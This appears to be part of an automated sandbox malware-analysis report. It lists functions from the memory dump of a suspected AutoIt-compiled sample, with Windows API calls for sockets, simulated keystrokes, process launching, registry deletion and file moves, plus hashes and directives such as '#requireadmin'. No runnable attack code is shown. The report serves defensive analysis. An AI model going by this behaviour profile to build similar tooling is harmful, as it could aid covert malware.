htons.WSOCK32(?,?,?,00000000,?), ref: 01006CEA
inet_ntoa.WSOCK32(?), ref: 01006CA7

Part of subcall function 00FEA7E9: _strlen.LIBCMT ref: 00FEA7F3
Part of subcall function 00FEA7E9: _memmove.LIBCMT ref: 00FEA815

_strlen.LIBCMT ref: 01006D44
_memmove.LIBCMT ref: 01006DAD

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
String ID:
API String ID: 3619996494-0
Opcode ID: 0d13f38831bbd95659363893b76152f404d3f19e2c48db45c43f4017208800d1
Instruction ID: dfed5f51ed2b166f3748f5bffada585db58e32c641a5d76a4d5d6b78d80b38ba
Opcode Fuzzy Hash: 0d13f38831bbd95659363893b76152f404d3f19e2c48db45c43f4017208800d1
Instruction Fuzzy Hash: 2781E371508300ABEB11EF28CC82E6EB7E9AF84714F00491DF5959B2D2DB79ED45CB92

Function 00F91424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea20c771ffebad88c78db6c4877f65438fc0764045e651224f4c6b72db1057a0
Instruction ID: 02ce14ba61096af200f97675edbc517cb65cf802905c660e484088ecca21ffca
Opcode Fuzzy Hash: ea20c771ffebad88c78db6c4877f65438fc0764045e651224f4c6b72db1057a0
Instruction Fuzzy Hash: 6F718D3590010AEFDF14DF98CC49EBEBB78FF8A320F248159F915AA251C734AA51DB60

Function 0101B351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(01B38578), ref: 0101B3EB
IsWindowEnabled.USER32(01B38578), ref: 0101B3F7
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0101B4DB
SendMessageW.USER32(01B38578,000000B0,?,?), ref: 0101B512
IsDlgButtonChecked.USER32(?,?), ref: 0101B54F
GetWindowLongW.USER32(01B38578,000000EC), ref: 0101B571
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0101B589

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: 3c6ee94f9d5072e95659d084cf83b46344da6d309af21ce0d14666e547f19e74
Instruction ID: 8382f48ce073d63c19115b5d91a69e329d5b1d64d861945be6a163c6fde767f6
Opcode Fuzzy Hash: 3c6ee94f9d5072e95659d084cf83b46344da6d309af21ce0d14666e547f19e74
Instruction Fuzzy Hash: 3A718038640205AFEB619F69C894FBA7BF5FF09310F048499FAC597259CB3AA950CB50

Function 0100F41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0100F448
_memset.LIBCMT ref: 0100F511
ShellExecuteExW.SHELL32(?), ref: 0100F556

Part of subcall function 00F99837: __itow.LIBCMT ref: 00F99862
Part of subcall function 00F99837: __swprintf.LIBCMT ref: 00F998AC

Part of subcall function 00FAFC86: _wcscpy.LIBCMT ref: 00FAFCA9

GetProcessId.KERNEL32(00000000), ref: 0100F5CD
CloseHandle.KERNEL32(00000000), ref: 0100F5FC

Strings

@, xrefs: 0100F525

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: 45e278c640dda038ff77c8fc2225afb351645504722b1a53a9eb7e77b17d9116
Instruction ID: c1a226d49b1654fd44586e021e7f1d80ebc4f5a19e2d9b4d903f7ae094b05332
Opcode Fuzzy Hash: 45e278c640dda038ff77c8fc2225afb351645504722b1a53a9eb7e77b17d9116
Instruction Fuzzy Hash: B561AD70A0061A9FEF15EF68C8819AEBBF5FF48310F15805DE855AB391CB35AD41DB80

Function 00FF0F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00FF0F8C
GetKeyboardState.USER32(?), ref: 00FF0FA1
SetKeyboardState.USER32(?), ref: 00FF1002
PostMessageW.USER32(?,00000101,00000010,?), ref: 00FF1030
PostMessageW.USER32(?,00000101,00000011,?), ref: 00FF104F
PostMessageW.USER32(?,00000101,00000012,?), ref: 00FF1095
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00FF10B8

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: bc26d0540ade0397344de82f8a3f63548dd921ec503e34c12320858fb46a9ff4
Instruction ID: 71172d7cdec0971f026d4f902a8685ba7ad3fdeb188a3a04bbf1f7ed0399ce93
Opcode Fuzzy Hash: bc26d0540ade0397344de82f8a3f63548dd921ec503e34c12320858fb46a9ff4
Instruction Fuzzy Hash: B7510660A047D9BDFB3642348C05BB6BEA96F06324F08858DE3D5958E3C6D9DCC8E751

Function 00FF0D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00FF0DA5
GetKeyboardState.USER32(?), ref: 00FF0DBA
SetKeyboardState.USER32(?), ref: 00FF0E1B
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00FF0E47
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00FF0E64
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00FF0EA8
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00FF0EC9

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: f6b01f71218f41de5cbbfdf04c530f3e299022719e1e012cdcb232cca6e8b654
Instruction ID: 793268c9f0eac49e3a3a847eff599d51e63fb55910c2ffa9bd67cf51099063fd
Opcode Fuzzy Hash: f6b01f71218f41de5cbbfdf04c530f3e299022719e1e012cdcb232cca6e8b654
Instruction Fuzzy Hash: 965108A0A047D97DFB3286748C45B7ABFA96F06310F088889F2D4564E3DB95AC98F750

Function 00FF55FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00FF560A
_wcsncpy.LIBCMT ref: 00FF563F
_wcsncpy.LIBCMT ref: 00FF5671
_wcsncpy.LIBCMT ref: 00FF56A4
_wcsncpy.LIBCMT ref: 00FF56E6
_wcsncpy.LIBCMT ref: 00FF5720
_wcsncpy.LIBCMT ref: 00FF574F

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: ea0900d4e71d7e2179c9e9db9eedaa8d6cd521c2cd82ad756810e4cc94b8de16
Instruction ID: cf0d7f97079d7e1e24152893341178908fa42f0b4f02c22c0edd3f2ffdd1ab41
Opcode Fuzzy Hash: ea0900d4e71d7e2179c9e9db9eedaa8d6cd521c2cd82ad756810e4cc94b8de16
Instruction Fuzzy Hash: 1941D566C1021876CB11FBB58C469DFB3B89F04310F508956E619E3221FB38A345DBE6

Function 00FF3671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00FF466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00FF3697,?), ref: 00FF468B

Part of subcall function 00FF466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00FF3697,?), ref: 00FF46A4

lstrcmpiW.KERNEL32(?,?), ref: 00FF36B7
_wcscmp.LIBCMT ref: 00FF36D3
MoveFileW.KERNEL32(?,?), ref: 00FF36EB
_wcscat.LIBCMT ref: 00FF3733
SHFileOperationW.SHELL32(?), ref: 00FF379F

Strings

\*.*, xrefs: 00FF372D

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: 82e23961a66b37e4813fe4589e84114e37727d32afe0c2b56a2df8034355f640
Instruction ID: 74ab952208fbad4795bbc48dd0692df29bcc366f1d897aae1f2089c87d23d013
Opcode Fuzzy Hash: 82e23961a66b37e4813fe4589e84114e37727d32afe0c2b56a2df8034355f640
Instruction Fuzzy Hash: 5F41B672508349AEC752EF64C8419EF77E8AF88350F00092EF599C3161EB38D689DB52

Function 01017291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 010172AA
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01017351
IsMenu.USER32(?), ref: 01017369
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 010173B1
DrawMenuBar.USER32 ref: 010173C4

Strings

0, xrefs: 0101729E

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: 6cb01649b0b8066d06490b6c8a862b6e435a5bb90389c8af516050ccffa2a0f9
Instruction ID: 57ffa86c843b123cadc5e2353b4337766b2fcf85c8b5780dda049142a0ddb01d
Opcode Fuzzy Hash: 6cb01649b0b8066d06490b6c8a862b6e435a5bb90389c8af516050ccffa2a0f9
Instruction Fuzzy Hash: 41417975A00209EFDB20DF54D885EAABBF8FF08310F14846AFE85A7254D739A900CF60

Function 01010FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 01010FD4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 01010FFE
FreeLibrary.KERNEL32(00000000), ref: 010110B5

Part of subcall function 01010FA5: RegCloseKey.ADVAPI32(?), ref: 0101101B
Part of subcall function 01010FA5: FreeLibrary.KERNEL32(?), ref: 0101106D
Part of subcall function 01010FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 01011090

RegDeleteKeyW.ADVAPI32(?,?), ref: 01011058

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: b6e031976fcf49ff6adf87865e4eb2313553e112089c3c33fcfd88682a24a14e
Instruction ID: 5699ac092012bd72f9d392173d467dada02c5130a6c4aa637d1cd3d77f06cb87
Opcode Fuzzy Hash: b6e031976fcf49ff6adf87865e4eb2313553e112089c3c33fcfd88682a24a14e
Instruction Fuzzy Hash: CD310371E01109BFEB66DFA4D885EFFB7BCEF04300F000169F645A2144D7799A499B60

Function 010162CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 010162EC
GetWindowLongW.USER32(01B38578,000000F0), ref: 0101631F
GetWindowLongW.USER32(01B38578,000000F0), ref: 01016354
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 01016386
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 010163B0
GetWindowLongW.USER32(00000000,000000F0), ref: 010163C1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 010163DB

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: d81fe87e0c965b9343b8ec552e4bd958dd89dcf0d21bf4598250783c99f52a04
Instruction ID: 03a21f7384a26b3ce0036a23b434db1b678fc1968246f60ee3c6e513245feebc
Opcode Fuzzy Hash: d81fe87e0c965b9343b8ec552e4bd958dd89dcf0d21bf4598250783c99f52a04
Instruction Fuzzy Hash: FF313934600241AFDB21CF29DC84F6537E1FB49714F1981A4F5809F2BACBBBA844CB50

Function 00FEDAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00FEDB2E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00FEDB54
SysAllocString.OLEAUT32(00000000), ref: 00FEDB57
SysAllocString.OLEAUT32(?), ref: 00FEDB75
SysFreeString.OLEAUT32(?), ref: 00FEDB7E
StringFromGUID2.OLE32(?,?,00000028), ref: 00FEDBA3
SysAllocString.OLEAUT32(?), ref: 00FEDBB1

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 29d1f5ed51abb912cddb3c9403a900d378924295c462b680e2df09ee538c8833
Instruction ID: a5f9b2135c5749d3a54e876beca6c905d81a498c627ce3912ea6d6c991d4a334
Opcode Fuzzy Hash: 29d1f5ed51abb912cddb3c9403a900d378924295c462b680e2df09ee538c8833
Instruction Fuzzy Hash: 6121C43660121AAFDF10EEA9DC88CBB73ACFB49360B018125F954DB290EB78DC459760

Function 01006173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 01007D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 01007DB6

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 010061C6
WSAGetLastError.WSOCK32(00000000), ref: 010061D5
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0100620E
connect.WSOCK32(00000000,?,00000010), ref: 01006217
WSAGetLastError.WSOCK32 ref: 01006221
closesocket.WSOCK32(00000000), ref: 0100624A
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 01006263

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: e2d8f0f93e21fb5c7d427176dd42bb35d268c37bfd323d7ebaf1ef7cbc7a34a5
Instruction ID: a658cbd2796ce2b7944ce8cf4aff7deedacc05387fcab29107bcbe5e2bffd379
Opcode Fuzzy Hash: e2d8f0f93e21fb5c7d427176dd42bb35d268c37bfd323d7ebaf1ef7cbc7a34a5
Instruction Fuzzy Hash: 6D31C431600118ABEF11AF68CC85BBE7BADEF45750F044059FD85D72C1DB79A8188B61

Function 00FEF65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00FEF671
__wcsnicmp.LIBCMT ref: 00FEF692
__wcsnicmp.LIBCMT ref: 00FEF6AC

Strings

#OnAutoItStartRegister, xrefs: 00FEF6A6
#notrayicon, xrefs: 00FEF669
#requireadmin, xrefs: 00FEF68C

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: 73e8fcbd7d3367e58d0ad75ff13842b9f79d5e8823044689b193824793f96796
Instruction ID: d23d9d6eba2cc687756c0955b4f6b389fa6d573a8ad31ef417fb14e462f2c823
Opcode Fuzzy Hash: 73e8fcbd7d3367e58d0ad75ff13842b9f79d5e8823044689b193824793f96796
Instruction Fuzzy Hash: 3621797361419167D730A637AC02FB77399EF55360F104039F482CA051EF649D89F294

Function 00FEDBC4 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00FEDC09
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00FEDC2F
SysAllocString.OLEAUT32(00000000), ref: 00FEDC32
SysAllocString.OLEAUT32 ref: 00FEDC53
SysFreeString.OLEAUT32 ref: 00FEDC5C
StringFromGUID2.OLE32(?,?,00000028), ref: 00FEDC76
SysAllocString.OLEAUT32(?), ref: 00FEDC84

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 1f2d6d6d18c0093aa2448673869aacadabd37c7c06913bc58f9d502577ea0130
Instruction ID: c0e18863f5d9ff63a054c7e47820f5af8866e4f704df4d6ee2db41eb4132d026
Opcode Fuzzy Hash: 1f2d6d6d18c0093aa2448673869aacadabd37c7c06913bc58f9d502577ea0130
Instruction Fuzzy Hash: 3621B636604245AFDB10EFADDC88DAB77ECEB08360B108125F954CB254DB79EC45DB64

Function 010175CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F91D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00F91D73
Part of subcall function 00F91D35: GetStockObject.GDI32(00000011), ref: 00F91D87
Part of subcall function 00F91D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F91D91

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 01017632
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0101763F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0101764A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 01017659
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 01017665

Strings

Msctls_Progress32, xrefs: 01017603

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 0f8d848335f1464cf5d49939533159050f6db75421a98c491cc475aa389d8616
Instruction ID: ac6a7b35d1f282783158ecaf5a89868a1798d870b4197a62883165da02f3ed1e
Opcode Fuzzy Hash: 0f8d848335f1464cf5d49939533159050f6db75421a98c491cc475aa389d8616
Instruction Fuzzy Hash: 9811B2B211021ABFEF158F64CC85EEB7F6DFF0C798F014115BA44A6054CA769C21DBA4

Function 00FB9AE6 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 00FB9AE6

Part of subcall function 00FB3187: EncodePointer.KERNEL32(00000000), ref: 00FB318A
Part of subcall function 00FB3187: __initp_misc_winsig.LIBCMT ref: 00FB31A5
Part of subcall function 00FB3187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00FB9EA0
Part of subcall function 00FB3187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00FB9EB4
Part of subcall function 00FB3187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00FB9EC7
